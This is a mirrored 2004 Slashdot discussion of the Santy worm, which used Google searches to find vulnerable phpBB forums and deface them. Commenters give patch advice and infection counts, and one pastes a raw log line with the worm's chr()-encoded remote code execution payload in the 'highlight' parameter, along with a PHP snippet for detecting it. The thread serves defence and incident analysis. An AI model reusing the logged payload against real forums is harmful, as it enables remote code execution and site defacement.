Slashdot Mirror

← Back to Stories (view on slashdot.org)

Net Worm Uses Google to Spread

Posted by michael on from the web-service-takes-on-new-meaning dept.

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

28 of 309 comments (clear)

  1. Quick! by Anonymous Coward · · Score: 5, Funny

    Someone figure out a way to blame this on Microsoft!

    1. Re:Quick! by ptr2004 · · Score: 4, Funny

      In other news. A tele-marketer used a telephone directory to make calls

    2. Re:Quick! by AmberBlackCat · · Score: 5, Funny
      Someone figure out a way to blame this on Microsoft!

      The PHP guys will probably blame it on Apache 2.

  2. Under the Google radar by Meostro · · Score: 5, Interesting

    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta engine for the article.

    1. Re:Under the Google radar by orangesquid · · Score: 5, Informative

      You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22Never EverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
      0, 1, 2, 3 - no hits
      4 - 2335 hits
      5 - 9297 hits
      6 - 7218 hits
      7 - 7288 hits
      8 - 10746 hits
      9 - 12009 hits
      10 - 11752 hits
      11 - 14866 hits
      12 - 13267 hits
      13 - 8393 hits
      14 - 13317 hits
      15 - 3840 hits
      16 - 5004 hits
      17 - 1950 hits
      18 - 3344 hits
      19 - 6 hits
      20 - 1 hit
      21 - 3 hits
      22 - 1 hit
      23 - 1 hit
      24 - 1 hit
      25, 26, 27, 28, 29, 30 - no hits

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Head line is way to misleading by mkop · · Score: 5, Informative

    There is nothing wrong with google. only with people who have not pathced the php buletin boards

    1. Re:Head line is way to misleading by taylortbb · · Score: 5, Informative

      Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

      phpBB has an explanation of what the problem is, it can be found at:
      http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=24 8046

      OTHER FORUMS ARE VULNERABLE

      (and no, I am not a phpBB zealot, I am pointing out a misconception)

    2. Re:Head line is way to misleading by sr180 · · Score: 3, Informative
      A board I assist to admin was done and it Runs Invision Power Board on PHP. The worm kept knocking it over, originally it started as version 1.2 but eventually changed to version 1.3.

      That indicates to me that someone may have been doing some active development on it...

      --
      In Soviet Russia the insensitive clod is YOU!
  4. Poor /. by roman_mir · · Score: 5, Funny

    I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

    --
    You can't handle the truth.
  5. Latest Version of phpBB Unaffected by akiy · · Score: 5, Informative

    It looks like the latest phpBB version 2.0.11 or a simple patch will thwart the worm, though. Time to upgrade if you haven't yet!

    --

    --
    http://www.aikiweb.com - AikiWeb Aikido Information

    1. Re:Latest Version of phpBB Unaffected by Cutriss · · Score: 5, Informative

      Yes and no.

      It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

      Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

      --
      "Mod, mod, mod...and another troll bites the dust."
    2. Re:Latest Version of phpBB Unaffected by topynate · · Score: 4, Insightful
      Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

      Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

  6. If the virus goes senile... by StevenHenderson · · Score: 3, Funny

    it can always use Google Suggest to find victims. :)

  7. And in a complete upset by Marxist+Hacker+42 · · Score: 4, Funny

    Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, google turns up zero on the same nonsense keyword!

    --
    SJW: a person who perceives an injustice, and while correcting it, commits a greater injustice.
  8. Infect Slashdot by somethinghollow · · Score: 5, Funny

    When it infects sites running SlashCode, it pretends to be a legitament post (so it can get the defacement tag "NeverEverNoSanity" on the front page, then monitors for posting, and tries to get first post, too.

  9. I got hit HARD! :( by Broadband · · Score: 5, Interesting

    This worm is unbelieveably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

    -BB

  10. snort signatures by UnderAttack · · Score: 3, Informative

    The ISC posted a couple of snort sigs and other details.

    --
    ---- join dshield.org Distributed Intrusion Detec
  11. Re:Hmmmm by Sikmaz · · Score: 3, Informative

    Different Exploit, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10

  12. Dshield disagrees by JustinXB · · Score: 3, Insightful
    See here
    Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.
    Who are you going to believe: Some news site or a security community?
  13. Re:NeverEverNoSanity by Loether · · Score: 3, Informative
    The virus is searching google for sites not yet infected. Googling for "Powered by phpBB" does return results. Some of which are now defaced.

    If google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on google is becuase googlebot is extreamly slow to index new content on most sites.

    --
    TODO create witty sig.
  14. For all of you saying it's a PHP exploit by VeneficusAcerbus · · Score: 5, Informative
    From ISC:
    Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.
  15. Not PHP Bugs - phpBB exploit is used by a16 · · Score: 5, Informative

    As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

    This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

    So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

    I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

  16. Re:Ehhh.. Tape drive perhaps?? by Zen+Punk · · Score: 4, Informative

    Nonsense. A hard drive on the shelf, in the safe, whatever, is no more vulnerable than a tape on the shelf. If you left your backup tape mounted all the time, it would be just as insecure as adding a second drive and calling it a "backup."

    --
    Sleep is futile.
  17. This one's fun to debug - perl via url by falzbro · · Score: 5, Interesting
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters, you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz
    1. Re:This one's fun to debug - perl via url by Anonymous Coward · · Score: 3, Informative

      Dunno about you guys but I've been getting hits like that since NOVEMBER when the highlight bug first surfaced.

      You might want to amuse yourself with the following PHP code, add to viewtopic.php right after it checks "isset($HTTP_GET_VARS['highlight']))"...

      if (preg_match('/chr\(/', $HTTP_GET_VARS['highlight'])) {
      $h = preg_replace('/(?:%2e)?chr\((\d+)\)/ei', 'chr(\1)',
      $HTTP_GET_VARS['highlight']);
      $h = preg_replace('/%2e/i', '', $h);
      $h = preg_replace('/%27/', "'", $h);
      error_log("viewtopic hack attempt: $h", 0);
      }

      Then it will show you the hack attempts in the error log.

      Be sure to upgrade your PHP and phpBB FIRST! ;-)

  18. MSN actually returns 207 results by bharatman · · Score: 3, Informative


    MSN's first page estimates are always grossly inflated. Try this link instead:

    http://beta.search.msn.com/results.aspx?q=NeverE ve rNoSanity&first=200&count=10&FORM=PERE4

    Note that I the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.

  19. Download the full source code by EqualSlash · · Score: 3, Informative


    Looks like you didn't read the Bugtraq posting completely... There's an zip attachment with the fully decoded perl script.
    Download link

  20. Re:Clarification by ScottMacVicar · · Score: 5, Informative

    I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

    The PHP exploit was to do with the length part of a serialized string, it wasn't correctly enforced and a suitably large enough value would crash a crash and print out contents of the stack which could include any variable within the script. s:1000:"test"; the 1000 part is not correctly checked.

    The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

    So this worm only affects phpBB 2.0.10 and below.